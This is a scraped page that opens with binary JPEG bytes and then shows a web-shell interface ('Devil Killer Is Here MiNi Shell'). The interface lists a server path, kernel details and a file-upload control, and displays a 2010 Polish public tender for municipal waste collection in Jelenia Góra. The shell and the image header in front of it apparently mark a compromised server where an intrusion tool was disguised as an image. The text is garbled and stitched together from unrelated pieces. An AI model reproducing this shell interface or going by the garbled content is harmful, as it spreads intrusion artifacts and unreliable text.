JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100701/172119-N-2010.html

<p class="kh_header"><b>Jelenia Góra: wywóz odpadów komunalnych z nieruchomości komunalnych  administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze.</b><br>
<b>Numer ogłoszenia: 172119 - 2010; data zamieszczenia: 01.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Lokalowej "Południe" w Jeleniej Górze , Plac Piastowski 2A, 58-560 Jelenia Góra, woj. dolnośląskie, tel. 075 6428200, faks 075 6428201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgl.jga.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wywóz odpadów komunalnych z nieruchomości komunalnych  administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest świadczenie usług w zakresie:
.	dostarczenia oraz ustawienia pojemników do gromadzenia odpadów komunalnych, na teren nieruchomości  komunalnych administrowanych przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze, 
.	wywozu odpadów z nieruchomości  do miejsc ich unieszkodliwiania lub odzysku zgodnie z regulaminem utrzymania czystości i porządku na terenie m. Jelenia Góra (Uchwała Nr 129/XIX/2007 Rady Miejskiej m. Jelenia Góra z dnia 27.11.2007 r.)
.	dostarczenia Zamawiającemu worków na odpady organiczne.
CPV 90512000-9 - usługi transportu odpadów,
CPV 90513100-7 - usługi wywozu opadów pochodzących z gospodarstw domowych,
CPV 90513200-8 - usługi wywozu stałych odpadów miejskich.
Przez odpady komunalne należy rozumieć odpady powstające w  gospodarstwach domowych, a także odpady nie zawierające odpadów niebezpiecznych pochodzące od innych wytwórców odpadów, które ze względu na charakter lub skład są podobne do odpadów powstających w gospodarstwach domowych. 
Przez odpady komunalne wielkogabarytowe należy rozumieć odpady komunalne, które ze względu na swoje rozmiary i masę nie mogą być zbierane w typowych pojemnikach na odpady (np. meble, sprzęt AGD, wózki dziecięce itp.). 

Przedmiot zamówienia obejmuje wywóz odpadów pochodzących z nieruchomości komunalnych administrowanych przez Zamawiającego, tj.:
-	odpadów komunalnych, 
-	odpadów komunalnych wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego,
-	odpadów wrzucanych przez podmioty sprzątające Zamawiającego do pojemników na odpady, a pochodzące z usuwania zanieczyszczeń z obudów i miejsc do gromadzenia nieczystości i ich zamiatania oraz z opróżniania koszy ulicznych stanowiących własność Zamawiającego,
-	odpadów z selektywnej zbiórki odpadów typu plastik, szkło bezbarwne, szkło kolorowe, papier, kartony po napojach,
-	wywóz odpadów gromadzonych w obrębie 2 metrów od pojemników.
 
Nieruchomości administrowane przez Zakład Gospodarki Lokalowej Południe w Jeleniej Górze położone są w granicach administracyjnych miasta Jelenia Góra na obszarze obejmującym ok. 10 km2. Większość administrowanych nieruchomości to budynki mieszkalne z początku XX wieku, wielorodzinne, maksymalnie 4 kondygnacyjne. W budynkach brak jest zsypów na śmieci. Odpady stałe winny być gromadzone w urządzeniach do gromadzenia odpadów (szczelnych, zamkniętych pojemnikach) usytuowanych obok budynków w wyznaczonych w tym celu miejscach. Obok pojemników składowane są przez mieszkańców przedmioty wielkogabarytowe takie jak stare meble, opakowania, sprzęt AGD, a wiosną i jesienią odpady organiczne - głównie liście i gałęzie. Stwierdzono bardzo częste przypadki wysypywania z pojemników odpadów przez osoby zajmujące się poszukiwaniem surowców wtórnych.

     Wymaga się następującą częstotliwość odbioru odpadów komunalnych:
1)	niesegregowane odpady komunalne oraz odpady ulegające biodegradacji - nie rzadziej 
      niż jeden raz w tygodniu;
2)	odpady segregowane (szkło, papier, tworzywa sztuczne) - nie rzadziej niż jeden raz w
miesiącu.
     
    W administrowanych nieruchomościach komunalnych wg stanu na 31.05.2010 r. 
     zamieszkuje 3.736 osób.

Zamawiający informuje ponadto, że zarządza nieruchomościami Wspólnot   Mieszkaniowych, w których wg stanu na 30.06.2010 r. zamieszkuje 3545 osób.     Zamawiający zaprosi Wykonawcę którego oferta zostanie wybrana w powyższym     postępowaniu do rokowań i zawarcia umowy na świadczenie powyższych usług na rzecz     Wspólnot Mieszkaniowych na warunkach tożsamych jak dla budynków komunalnych.
     
     Usługi obejmują następujący zakres czynności:
1. dostarczenie oraz ustawienie pojemników o pojemności od 120 do 1100 litrów, w terminie
     uzgodnionym z Zamawiającym w punktach gromadzenia nieczystości określonych w
     załącznikach nr 7A i 7B, we własnym zakresie i  na własny koszt standardowych, 
     ujednoliconych, oznakowanych nazwą  Wykonawcy urządzeń do gromadzenia  odpadów,
     ustawienie  ich   w   miejscach   wg  Planu  rozmieszczenia pojemników łącznie z 	harmonogramem ich opróżniania,  mycia i  dezynfekcji,  który wybrany Wykonawca opracuje 	w terminie 7 dni po podpisaniu umowy. 
2. wszystkie pojemniki muszą spełniać następujące wymogi techniczne i estetyczne:
a)	muszą być oznaczone ( logo lub nazwa podmiotu uprawnionego prowadzącego działalność w zakresie odbierania odpadów komunalnych),
b)	mają mieć schludny i estetyczny wygląd,
c)	mają być odporne na uszkodzenia mechaniczne, zmienne warunki atmosferyczne i wahania temperatur, a po opróżnieniu mają być ustawione w sposób gwarantujący ich stabilność,
d)	muszą być czyste na zewnątrz,
e)	muszą być bezwzględnie wyposażone w zamknięcia, klapy, pokrywy, a urządzenia te powinny być zawsze sprawne,
3.  ustawienie  zestawów pojemników przeznaczonych do selektywnej zbiórki odpadów 
     typu plastik, szkło bezbarwne, szkło kolorowe, papier,  kartony po napojach oraz transport tych
     odpadów do miejsc ich odzysku. Lokalizację i ilości przedstawia załącznik nr 7 A i 7 B  do SIWZ.
4. dbanie o należyty stan techniczny ustawionych urządzeń do gromadzenia odpadów;
     wykonywanie napraw uszkodzonych urządzeń do gromadzenia odpadów w ciągu 3 dni
     od stwierdzenia lub od zgłoszenia faxem przez upoważnionego pracownika
    Zamawiającego uszkodzenia, spalenia lub kradzieży a w przypadku niemożności 
    usunięcia uszkodzeń, wymiany uszkodzonych lub nie nadających  się  do naprawy
    urządzeń na nowe, Zamawiający nie będzie ponosił kosztów z tego tytułu,
5. usuwanie z ustawionych urządzeń do gromadzenia odpadów, odpadów komunalnych
    z częstotliwością co najmniej l raz na tydzień, w dzień powszedni w godzinach nie
   zakłócających ciszy nocnej. W przypadku, gdy w przewidzianym do tego dniu odpady
    nie zostaną usunięte z przyczyn powodowanych warunkami atmosferycznymi lub faktem,
    że dzień ten będzie dniem ustawowo wolnym od pracy , odpady winny być usunięte  
    niezwłocznie w następnym dniu roboczym. Wykonawca zobowiązany jest do posprzątania
  stanowiska śmietnikowego bez dodatkowej opłaty. Wykonawca każdorazowo zobowiązany   będzie do usuwania zanieczyszczeń powstałych w wyniku załadunku.
6. mycie i dezynfekcja pojemników do gromadzenia odpadów w okresie od l kwietnia do 
    30 października nie rzadziej niż raz na miesiąc, w miejscu ich ustawienia w sposób nie
    pozostawiający zanieczyszczeń pojazdem specjalistycznym z zamkniętym obiegiem
    wody ze środkiem dezynfekującym,
7. sukcesywne usuwanie przedmiotów   wielkogabarytowych - zakłada się iż średnio
     miesięcznie jest ich około 5 ton,
8. utrzymywanie w należytym stanie higienicznym pojemników oraz ich otoczenia
    w obrębie obudowy a w przypadku jej braku w promieniu 2 metrów od pojemników ,
9.  wywóz odpadów na wysypisko,
10. dostarczanie wiosną i jesienią worków na liście i odpady organiczne oraz usuwanie zapełnionych
      worków,
11. wiosną i jesienią zamawiający wymaga wywiezienia   liści i odpadów organicznych
     gromadzonych w obrębie pojemników, w miejsce przeznaczone do kompostowania lub spalenia,
12. nie dopuszczanie do przepełnienia urządzeń do gromadzenia odpadów,
13. zwiększenie częstotliwości wywozu w przypadku stwierdzenia przepełnienia urządzeń do
      gromadzenia odpadów,
14. jeżeli podczas realizacji zamówienia zajdzie konieczność usunięcia odpadów, na które wykonawca
      nie posiada zezwolenia ( np. odpadów niebezpiecznych, zwłok zwierząt), to ma obowiązek zlecić na
      własny koszt usunięcia tych odpadów, posiadającemu stosowne uprawnienia w tym  zakresie.
15. usługę w zakresie rozstawienia pojemników uważać się będzie za niewykonaną w przypadku
      stwierdzenia braku choćby jednego pojemnika  w stosunku do ilości zamówionej, lub takie ich 
      ustawienie, które nie zapewni stabilności pojemników,
16. usługę będącą przedmiotem niniejszego postępowania uważać się będzie za niewykonaną lub
      nienależycie wykonaną, jeżeli pojemniki nie będą spełniać wymogów pod względem 
      sanitarno-higienicznym, tzn. jeżeli stwierdzi się:
a)	przepełnienie pojemników odpadami, zabrudzenie na zewnątrz, nie wykonanie dezynfekcji w 
      ustalonym terminie,
b)	trwałe uszkodzenie pojemników uniemożliwiające korzystanie z nich, tj. niesprawne zamknięcia
klapy, pokrywy (zepsute zawiasy lub ich brak), uszkodzenia ścian pojemników.

Opróżnione pojemniki winny być odstawione na miejsce. W przypadku wysypania się odpadów/śmieci w miejscu ich załadunku do samochodu, zabrudzony teren winien zostać oczyszczony. 

Załącznikami do opisu przedmiotu zamówienia są Załączniki nr 7A i 7B obejmujące:
- Wykaz budynków, osób i pojemników ROM-1 - załącznik Nr 7 A,
- Wykaz budynków, osób i pojemników ROM-2 - załącznik Nr 7 B.
Zamawiający wymaga wyliczenia ceny usługi opisanej w pkt 3 SIWZ na l mieszkańca jak również podanie ceny jednostkowej 1 m3 za wywóz odpadów pochodzących z lokali użytkowych. 
Na terenie administrowanym zamieszkuje 3.736 osób, cena za cały przedmiot zamówienia winna być obliczona w oparciu o opis przedmiotu zamówienia oraz dane z Załączników nr 7A i 7B.
Podane ilości i pojemności pojemników wynikają z dotychczasowych potrzeb. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia tej ilości z uwagi miedzy innymi na migrację ludności, powstawanie nowych Wspólnot Mieszkaniowych, itp.
Zmiany ilości osób z lokali mieszkalnych i powierzchni lokali użytkowych następować mogą w przedziałach kwartalnych poprzez aktualizację Załączników 7A i 7B do umowy (Zamawiający zastrzega sobie prawo ich dokonywania).
Bez względu na jakiekolwiek ograniczenia wynikające z opisu przedmiotu zamówienia  Wykonawca winien mieć świadomość, że ceny jednostkowe podane przez niego w Formularzu ofertowym stanowią postawę do wyliczenia wynagrodzenia za usługę wykonaną i zakończoną pod każdym względem według rzeczywistego stanu. 
Uważa się, że Wykonawca wziął pod uwagę wszystkie wymagania i zobowiązania zawarte w specyfikacji istotnych warunków zamówienia. W wynagrodzenie wykonawcy muszą być wkalkulowane wszelkie wydatki niezbędne do realizacji przedmiotu umowy (np. ustawienie, wymiana lub naprawa pojemników, wywóz odpadów, opłaty za umieszczenie odpadów na składowisku, nagłe i nieprzewidziane wydatki, podwyżki opłat itp.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.20.00-9, 90.51.31.00-7, 90.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ofertę należy zabezpieczyć wniesieniem wadium w wysokości 10.000,00 zł, które należy wnieść przed terminem składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy posiadają:
             
      1)  aktualny odpis z rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności 
      gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do
      ewidencji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania
      ofert;
2)	zezwolenie na prowadzenie działalności gospodarczej w zakresie odbioru odpadów
      komunalnych  na terenie miasta Jelenia Góra - zgodnie z ustawą o  utrzymaniu czystości i
            porządku w gminach dnia 13.09.1996 r. (Dz.U. z 1996 r. nr 132 poz.622 z poźń. zm.);
3)	zezwolenie na prowadzenie działalności gospodarczej w zakresie transportu odpadów 
      zgodnie z ustawą z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. 2007 r. Nr 39 poz. 251 z
      późn. zm.).

Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokonuje oceny spełniania warunków formalnych wymaganych od Wykonawcy na podstawie oświadczeń i dokumentów  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy w okresie ostatnich 3 lat wykonali, chyba że okres działalności jest krótszy to w tym okresie, a także wykonywanych zamówień: co najmniej 1 zamówienie odpowiadające swoim rodzajem usłudze stanowiącej przedmiot zamówienia, z podaniem jej wartości,  przedmiotu, dat wykonania i odbiorców o wartości minimum 200.000,00 zł brutto w skali roku każda,  wraz z  załączonym dokumentem potwierdzającym, że usługi te zostały  wykonane lub są  wykonywane należycie, zgodnie z treścią załącznika nr 4 do SIWZ.

Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokonuje oceny spełniania warunków formalnych wymaganych od Wykonawcy na podstawie oświadczeń i dokumentów  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują minimum:
1)	pojemnikami na odpady o pojemności od 120 do 1100 litrów w ilościach minimum 
     jak w sumie załączników nr  7A i 7 B do SIWZ,
2)	minimum 2 bezpylnymi pojazdami wyposażonymi w umocowania do opróżniania
         pojemników o wymienionej pojemności oraz hydrauliczną prasę lub innym  urządzeniem
       do zagęszczania odpadów, 
3)	specjalistycznym pojazdem z zamkniętym obiegiem wody do mycia i dezynfekcji
         pojemników,
 zgodnie z treścią załącznika nr 5 do SIWZ.

Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokonuje oceny spełniania warunków formalnych wymaganych od Wykonawcy na podstawie oświadczeń i dokumentów  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy posiadają  polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100.000,00 zł.

Opis sposobu dokonywania oceny spełniania tego warunku:
Zamawiający dokonuje oceny spełniania warunków formalnych wymaganych od Wykonawcy na podstawie oświadczeń i dokumentów  na zasadzie spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć:
1)	wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru stanowiącego załącznik do SIWZ;
2)	pełnomocnictwo dla reprezentanta - dotyczy podmiotów występujących wspólnie;
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu, zgodnie z art. 44 ustawy, wg 
      wzoru stanowiącego załącznik do SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
